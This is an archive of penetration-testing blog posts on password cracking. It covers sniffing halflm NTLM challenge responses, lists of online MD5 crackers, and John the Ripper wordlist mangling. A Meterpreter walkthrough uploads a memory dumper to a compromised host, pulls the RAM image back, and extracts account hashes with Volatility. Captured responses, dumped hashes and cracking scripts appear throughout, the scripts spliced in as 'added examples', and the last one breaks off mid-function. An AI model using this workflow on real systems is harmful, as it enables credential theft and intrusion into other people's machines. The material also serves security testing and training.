Showing posts with label password cracking. Show all posts

Thursday, July 1, 2010

Revisiting HALFLM Stuff

I covered some of the halflm challenge sniffing stuff in a previous post.

But I had to revisit it the other day for work and couldn't find the actual tables and program from that post, so here are some updated links.

where to grab the tables:

http://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/

where to grab the program:

http://sourceforge.net/projects/rcracki/

One gotcha I ran into on the last PT was that, for some reason, the SMB and NTLM sniffing modules were handing me odd hashes.

In some cases the responses were not the same for the same username and hostname; those were unusable. A response that changes from session to session for the same account means the client is mixing in a nonce of its own (NTLM2 session security or NTLMv2), so the static 1122334455667788 server challenge no longer pins the response down and the halflm tables cannot be applied to it. I also had some with a bunch of zeros in them, and those were not crackable either. The one below is not a response at all: the long field starts with 4c4d535350 00 03000000, the ASCII "LMSSP" of an NTLMSSP signature followed by message type 3, so it looks like a captured AUTHENTICATE message rather than a 24-byte LM response, and the NT field is just 16 zero bytes.

Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000

But I did get scanned with smb_login, which was fun:

ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5
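Before feeding any of that to the tables it pays to sort the captures. The script below is an added example, not code from this post or from the rcracki project; it takes the captures above (embedded as constructed input in the sniffer's <client>:<domain>:<challenge>:<LM>:<NT> line format) and splits each LM response into the three DES blocks it is made of. The first 8 bytes are what the halflm tables invert (they depend only on the first 7 characters of the password), the last 8 bytes depend only on LM-hash bytes 14-15 plus zero padding and so are identical for every password of 7 characters or fewer under a fixed challenge, and the two junk patterns discussed above (a whole NTLMSSP message, a client-nonce-plus-zeros NTLM2 response) are rejected before they waste table time. Function and field names are my own.

```python
import re
from collections import Counter, defaultdict

STATIC_CHALLENGE = "1122334455667788"   # the fixed server challenge the halflm tables assume

# Constructed input: the captures shown above, one per line, embedded so the script
# runs offline. Format: <client description>:<domain>:<challenge>:<LM response>:<NT response>
CAPTURES = """\
Windows 2000 2195:Windows 2000 5.0:1122334455667788:4c4d5353500003000000010001004600000000000000470000000000000040000000000000004000000006000600400000001000100047000000158a88e048004f0044000081196a7af2e4491c28af3025741067535700:00000000000000000000000000000000
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:59de5d885e583167c3a9a92ac42c0ae52f85252cc731bb25:5ada49d539bd174e7049805dc1004925e25130c33dbe892a
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:40305b22075d6000d0508d9ad1f7beb02f85252cc731bb25:337c939e66480243d1833309b8afe49a81fe4c5e646bf00a
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:daf3570c10ed2817c3d8a05d69f9ef292f85252cc731bb25:d3fb390bac5d152f7a394466fbef686e275d05b99c0a115e
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cdedae86934bb23ef89f50fc595
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:d737aa8f95ce38359cab5d8a2519c4b92f85252cc731bb25:0624a3f7d457c54b163c641dbf4b7963548ef1c5d0397cbf
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:0e89a68d07e315c6035e82b757b955882f85252cc731bb25:58f2d720179b4a38a0523e02aef0d41dacccd6577eaa943c
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:aa9436c1d40cb53f3e7a20091c4b931c2f85252cc731bb25:8ac45acdbd60f2fad3081ecf005536efa6009c21ca5faf36
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:dce867f0cb638db2dbcc3576a52dc4612f85252cc731bb25:8990b33dac65c5ef75073829894b911a983c1e260fbd1097
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:6f9d851d74c8a095c9df672a1554bebc2f85252cc731bb25:89953de6f957b7db5fe664d23af3de41dd38f5ec0a4a6eb0
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b7582273227fd61a5952f85252cc731bb25:76d3c3deb0bb8ef1a1e41ab6a3f6c686a321ce016c624567
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:cc96cc93b4dc9b754db66776827758d30b7892eef2e3f2bc:df58ae0f786becc11be11034dc53b21bdf1d73579af868d1
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:de5d1d85daf6593d0a09ff32049013ab2f85252cc731bb25:526471d8c4a0ecc8af05851804ea8fdd26848fa3ccc63152
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:b8489edee1058b43f3ce0f0abe5a16872f85252cc731bb25:57b9c47a75335692f60e787e41cd16a292a21bc667b3fd02
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:2b6b134af8d48f2a972bff5660420d582f85252cc731bb25:5018402148e15a8d77cb22dd46f1449a2791416b73ee9c3d
ADMIN Windows 2000 2195Windows 2000 5.0:NULL:1122334455667788:bb49aefd51ed0dccd5be291bd33be3052f85252cc731bb25:c9b255750bd88ac72e03adafda261e62618c943f7d59daf5
"""


def parse_capture(line):
    """Split from the right: the free-form client field may itself contain ':'."""
    head, challenge, lm, nt = line.strip().rsplit(":", 3)
    return {"client": head, "challenge": challenge.lower(), "lm": lm.lower(), "nt": nt.lower()}


def classify_lm(entry):
    """'candidate' if the LM field is a real LMv1 response to the static challenge,
    otherwise the reason it cannot be looked up in halflm tables."""
    lm = entry["lm"]
    if entry["challenge"] != STATIC_CHALLENGE:
        return "challenge is not the static one the tables were built for"
    if len(lm) != 48 or not re.fullmatch(r"[0-9a-f]+", lm):
        # 4c4d535350 is ASCII 'LMSSP', the tail of the NTLMSSP signature: a whole
        # NTLMSSP message was captured instead of the response field.
        if "4c4d535350" in lm:
            return "raw NTLMSSP message captured instead of a response"
        return "not a 24-byte LM response"
    if lm == "0" * 48:
        return "zeroed LM response"
    if lm[16:] == "0" * 32:
        return "NTLM2 session security: 8-byte client nonce + zeros, not password-derived"
    return "candidate"


def triage(text):
    entries = [parse_capture(l) for l in text.splitlines() if l.strip()]
    candidates, rejected = [], []
    for e in entries:
        verdict = classify_lm(e)
        (candidates if verdict == "candidate" else rejected).append((e, verdict))
    rejected = [(e["lm"][:20], why) for e, why in rejected]
    if not candidates:
        return {"lookup": [], "shared_prefix": {}, "longer_than_7": [],
                "rejected": rejected, "common_tail": None}
    # Bytes 0-7 of an LMv1 response are DES(challenge) under LM-hash bytes 0-6, which
    # depend only on the first 7 password characters: that is what halflm tables invert.
    # Bytes 16-23 are DES(challenge) under LM-hash bytes 14-15 plus five zero bytes, so
    # every password of 7 characters or fewer (second LM half = aad3b435b51404ee)
    # yields the same trailing block; a different tail means a longer password.
    common_tail = Counter(e["lm"][32:] for e, _ in candidates).most_common(1)[0][0]
    by_prefix = defaultdict(list)
    for e, _ in candidates:
        by_prefix[e["lm"][:16]].append(e["lm"])
    return {
        "lookup": sorted(by_prefix),                       # distinct 8-byte prefixes for rcracki_mt
        "shared_prefix": {p: len(v) for p, v in by_prefix.items() if len(v) > 1},  # same first 7 chars
        "longer_than_7": [lm for lms in by_prefix.values() for lm in lms if lm[32:] != common_tail],
        "rejected": rejected,
        "common_tail": common_tail,
    }


if __name__ == "__main__":
    for key, value in triage(CAPTURES).items():
        print(key, value)
```

On the captures above this yields 14 distinct prefixes to look up, two responses sharing the prefix cc96cc93b4dc9b75 (the same first seven characters, so one table hit covers both), two responses whose trailing block differs from the other thirteen (passwords longer than seven characters, so the second half still has to be brute-forced after the table gives up the first seven), and one line rejected as an NTLMSSP message.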

Monday, January 11, 2010

Various Online Password Crackers

Just a list of online (mostly MD5) crackers, though some handle other hash types as well.

This post over on pcsec got me thinking about them.

http://www.pcsec.org/archives/MD5Seacrh-v18-by-mass.html

Of course, not all of those are working, at least not for me.

So here is that list with links, plus a few others thanks to my Twitter homies.

passcracking.ru http://passcracking.ru/
md5crack http://md5crack.com/
md5decryption: http://md5decryption.com/
TheKaine.de: http://md5.thekaine.de/
AuthSecu: http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php
hashcrack: http://hashcrack.com/index.php
insidepro: http://hash.insidepro.com/
md5decrypter: http://md5decrypter.com/
md5pass.info: http://md5pass.info/

Bonus points for two of the sites from the screenshot just giving you a Parallels Plesk login.

Sites specifically mentioned to me, in no particular order:

Plain-Text.info http://plain-text.info/add/ (also has IRC support)
Hashkiller: http://hashkiller.com/password/
Cryptohaze: http://www.cryptohaze.com/addhashes.php
md5rednoize: http://md5.rednoize.com/
milw0rm: http://milw0rm.com/cracker/insert.php
GData: http://gdataonline.com/seekhash.php
c0llision: http://www.c0llision.net/webcrack.php (also has IRC support)
PassCracking http://passcracking.com/

Lastly, for fun, a metasploit module that submits the hash to md5crack.com and displays the password if its found.

msf auxiliary(md5check_md5crack) > run

[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to md5crack.com...
[*] plaintext md5 is: test
[*] Auxiliary module execution completed

link:
http://carnal0wnage.attackresearch.com/sites/default/files/md5check_md5crack.txt (rename to .rb)

I started to do more than just md5crack, but writing regexes for each site's result page just seemed like a waste of time.

Sunday, October 11, 2009

Creating wordlists with JTR

(mirrored from carnal0wnage.attackresearch.com)

Nothing new, probably covered elsewhere, but useful to revisit (maybe)... at least for my notes.

We had to try to brute-force the ColdFusion admin password on a past pentest (more on that in another post; still testing the new MSF ColdFusion modules). After trying my (short) popular-passwords list I came up with nil, so I decided to take some words from the site we were trying to break into and have John mangle that list into additional passwords to try.

You start with your initial list of words (you can also use CeWL, http://www.digininja.org/projects/cewl.php, to generate a site-specific wordlist for you).

You then throw them into John and have the rules file mangle them:

yomoma@c0:~/pentest/john/run$ ./john --wordlist=/tmp/passwords-startwith.lst --rules --stdout | ./unique /tmp/passwords-mangled.lst

started with:

blah
carnal
0wnage
carnal0wnage
carnalownage

I ended up with 159 words (it dropped carnal0wnage after the upcase, not sure why) based on John's default word-mangling rules, which may or may not be that useful to you.

That's where JTR Config Maker from http://reusablesec.googlepages.com/jtrconfiggenerator can come in handy.

specifically " -Option (3) allows you to create word mangling rules. For example, add two numbers to the end of the dictionary word, and replace ‘a’ with an ‘@’."

So I fiddled with it for a while and came up with a list I thought was better than the default rules. You can set pretty much any type of mangling rule you want, save the rules file, and even export a john.conf to use, so you can generate your password list as above.
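To make the rule-mangling step concrete, here is a small interpreter for the common subset of John's rule language, written as an added example for this post; it is not John's code and not the JTR Config Maker's. It handles the preprocessor's [...] character classes (so "$[0-9]$[0-9]" expands to the hundred "append two digits" rules the Config Maker text above describes), the usual case, append, prepend, substitute, reverse, duplicate and length-reject commands, and reproduces the rule-major order plus de-duplication of the `john --rules --stdout | unique` pipeline. The starting list is the five words above; the rule set at the bottom is my own choice, not the default john.conf rules, and length arguments are limited to single digits.

```python
import itertools
import re


def expand_rule(rule):
    """Expand John's [...] preprocessor classes, e.g. '$[0-9]$[0-9]' -> '$0$0' ... '$9$9',
    into the concrete rules they stand for. Escaping of '[' is not handled here."""
    choices = []
    for part in re.split(r"(\[[^\]]*\])", rule):
        if not part:
            continue
        if part.startswith("["):
            body, chars, i = part[1:-1], [], 0
            while i < len(body):
                if i + 2 < len(body) and body[i + 1] == "-":      # a-z style range
                    chars.extend(chr(c) for c in range(ord(body[i]), ord(body[i + 2]) + 1))
                    i += 3
                else:
                    chars.append(body[i])
                    i += 1
            choices.append(chars)
        else:
            choices.append([part])
    return ["".join(combo) for combo in itertools.product(*choices)]


def apply_rule(word, rule):
    """Apply one concrete rule to one word; None means a reject (>N, <N) fired."""
    w, i = word, 0
    while i < len(rule):
        cmd = rule[i]
        i += 1
        if cmd == ":":                                   # no-op: the word itself
            pass
        elif cmd == "l": w = w.lower()
        elif cmd == "u": w = w.upper()
        elif cmd == "c": w = w[:1].upper() + w[1:].lower()   # capitalize
        elif cmd == "C": w = w[:1].lower() + w[1:].upper()
        elif cmd == "t": w = w.swapcase()                # toggle case
        elif cmd == "r": w = w[::-1]                     # reverse
        elif cmd == "d": w = w + w                       # duplicate
        elif cmd == "f": w = w + w[::-1]                 # reflect
        elif cmd == "$": w, i = w + rule[i], i + 1       # $X: append X
        elif cmd == "^": w, i = rule[i] + w, i + 1       # ^X: prepend X
        elif cmd == "s": w, i = w.replace(rule[i], rule[i + 1]), i + 2   # sXY: X -> Y
        elif cmd == "@": w, i = w.replace(rule[i], ""), i + 1            # @X: purge X
        elif cmd == "[": w = w[1:]                       # delete first character
        elif cmd == "]": w = w[:-1]                      # delete last character
        elif cmd == ">":                                 # reject unless longer than N
            if not len(w) > int(rule[i]):
                return None
            i += 1
        elif cmd == "<":                                 # reject unless shorter than N
            if not len(w) < int(rule[i]):
                return None
            i += 1
        else:
            raise ValueError(f"unsupported rule command {cmd!r}")
    return w


def mangle(words, rules):
    """Rule-major expansion with de-duplication: each rule is run over the whole
    wordlist before the next, like 'john --rules --stdout | unique'."""
    seen, out = set(), []
    for rule in rules:
        for concrete in expand_rule(rule):
            for word in words:
                candidate = apply_rule(word, concrete)
                if candidate is not None and candidate not in seen:
                    seen.add(candidate)
                    out.append(candidate)
    return out


if __name__ == "__main__":
    START = ["blah", "carnal", "0wnage", "carnal0wnage", "carnalownage"]   # the list above
    RULES = [":", "l", "u", "c", "r", "d", "sa@", "ss$", "c$[0-9]", "$[0-9]$[0-9]", "c$[!@#]>5"]
    for candidate in mangle(START, RULES):
        print(candidate)
```

Swap RULES for whatever the Config Maker gives you and you can see exactly which candidates a rule produces before committing a long run to it.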

If people are interested in more detail on this process let me know via comments.

Sunday, March 8, 2009

Dumping Memory to Extract Password Hashes

Originally posted on Attack Research

Dumping memory with MDD using Meterpreter

adapted from: http://pauldotcom.com/wiki/index.php/Episode142

ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Example:

C:\tools\mdd> mdd -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 255.48 MB of physical memory to file 'memory.dd'.

65404 map operations succeeded (1.00)
0 map operations failed

took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image". MDD only copies physical memory, so you will need another tool to analyze the image.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter connection, upload MDD.

meterpreter > upload /root/mdd.exe .
[*] uploading : /root/mdd.exe -> .
[*] uploaded : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys

Execute MDD to capture RAM on the victim machine.

meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\> mdd.exe -o memory.dd
mdd.exe -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance

-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.

-> Dumping 511.48 MB of physical memory to file 'memory.dd'.

130940 map operations succeeded (1.00)
0 map operations failed

took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144

Optionally we can just use execute to run the tool without opening a command prompt. It really doesn't matter either way, since we are about to pull down 256+ MB of data and won't exactly be "stealthy":

meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.

Verify memory image has been captured.

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip
100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe

Download memory dump using Meterpreter.

meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./demo.dd

meterpreter >

Now that we have the .dd image locally, we can follow the instructions at http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to pull the password hashes out of memory.

Volatility --> https://www.volatilesystems.com/default/volatility

Installation and getting started: download and unzip Volatility from the location above, then download and install the registry patches from http://moyix.blogspot.com/2009/01/registry-code-updates.html (http://kurtz.cs.wesleyan.edu/%7Ebdolangavitt/memory/volreg-0.2.zip). You will need to overwrite your existing forensics, memory_objects, and memory_plugins folders. Once that is done, running python volatility should list the hivescan/hivelist options along with the rest:

$ python volatility

Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

usage: volatility cmd [cmd_opts]

Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'

Supported Internel Commands:
connections Print list of open connections
connscan Scan for connection objects
connscan2 Scan for connection objects (New)
datetime Get date/time information for image
dlllist Print list of loaded dlls for each process
dmp2raw Convert a crash dump to a raw dump
dmpchk Dump crash dump information
files Print list of open files for each process
hibinfo Convert hibernation file to linear raw image
ident Identify image properties
memdmp Dump the addressable memory for a process
memmap Print the memory map
modscan Scan for modules
modscan2 Scan for module objects (New)
modules Print list of loaded modules
procdump Dump a process to an executable sample
pslist Print list of running processes
psscan Scan for EPROCESS objects
psscan2 Scan for process objects (New)
raw2dmp Convert a raw dump to a crash dump
regobjkeys Print list of open regkeys for each process
sockets Print list of open sockets
sockscan Scan for socket objects
sockscan2 Scan for socket objects (New)
strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
thrdscan Scan for ETHREAD objects
thrdscan2 Scan for thread objects (New)
vaddump Dump the Vad sections to files
vadinfo Dump the VAD info
vadwalk Walk the vad tree

Supported Plugin Commands:
cachedump Dump (decrypted) domain hashes from the registry
hashdump Dump (decrypted) LM and NT hashes from the registry
hivelist Print list of registry hives
hivescan Scan for _CMHIVE objects (registry hives)
lsadump Dump (decrypted) LSA secrets from the registry

memmap_ex_2 Print the memory map
printkey Print a registry key, and its subkeys and values
pslist_ex_1 Print list running processes
pslist_ex_3 Print list running processes
usrdmp_ex_2 Dump the address space for a process

Example: volatility pslist -f /path/to/my/file

1. Run hivescan to get hive offsets

$ python volatility hivescan -f demo.dd
Offset (hex)
42168328 0x2837008
42195808 0x283db60
47598392 0x2d64b38
155764592 0x948c770
155973608 0x94bf7e8
208587616 0xc6ecb60
208964448 0xc748b60
234838880 0xdff5b60
243852936 0xe88e688
251418760 0xefc5888
252887048 0xf12c008
256039736 0xf42db38
269699936 0x10134b60
339523208 0x143cb688
346659680 0x14a99b60
377572192 0x16814b60
387192184 0x17141578
509150856 0x1e590688
521194336 0x1f10cb60
523667592 0x1f368888
527756088 0x1f74eb38

2. Run hivelist with the first hivescan offset

$ python volatility hivelist -f demo.dd -o 0x2837008
Address Name
0xe2610b60 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe25f0578 \Documents and Settings\Sarah\NTUSER.DAT
0xe1d33008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c73888 \Documents and Settings\LocalService\NTUSER.DAT
0xe1c04688 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b70b60 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1658b60 \WINDOWS\system32\config\software
0xe1a5a7e8 \WINDOWS\system32\config\default
0xe165cb60 \WINDOWS\system32\config\SAM
0xe1a4f770 \WINDOWS\system32\config\SECURITY
0xe1559b38 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]

3. Dump the password hashes (-y is the SYSTEM hive address and -s the SAM hive address, both taken from the hivelist output above)

$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

A couple of updates:

1. This technique only works on XP SP2 & SP3, no Vista, no Server 2003

2. New home for volreg plugins: http://www.cc.gatech.edu/%7Ebrendan/volatility/
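Before those lines go anywhere near a cracker it is worth reading what the dump already says. The script below is an added example (not code from this post, from Volatility or from the volreg plugins) that parses the hashdump output above, embedded here as constructed input, and classifies each account from two well-known constants: the LM and NT hashes of the empty string. An empty NT hash means a blank password; an empty LM hash with a real NT hash means no LM hash was stored (password over 14 characters, or LM storage disabled); and because the LM hash is two independent DES results over the upper-cased 7-character halves, an empty second half means the password is 7 characters or fewer, and every non-empty half can go into one batch regardless of which user it belongs to.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (also what 'no LM hash' looks like)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of ""
EMPTY_LM_HALF = EMPTY_LM[:16]                   # one unused 7-character LM half

# Constructed input: the hashdump output above, embedded so this runs offline.
HASHDUMP = """\
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump(text):
    """user:rid:lm:nt::: lines, as hashdump/pwdump print them."""
    accounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.split(":")[:4]
        accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def assess(acct):
    """What the two hashes say about the password before any cracking is done."""
    if acct["nt"] == EMPTY_NT:
        return "empty password"
    if acct["lm"] == EMPTY_LM:
        return "NT hash only (password longer than 14 chars or LM storage disabled)"
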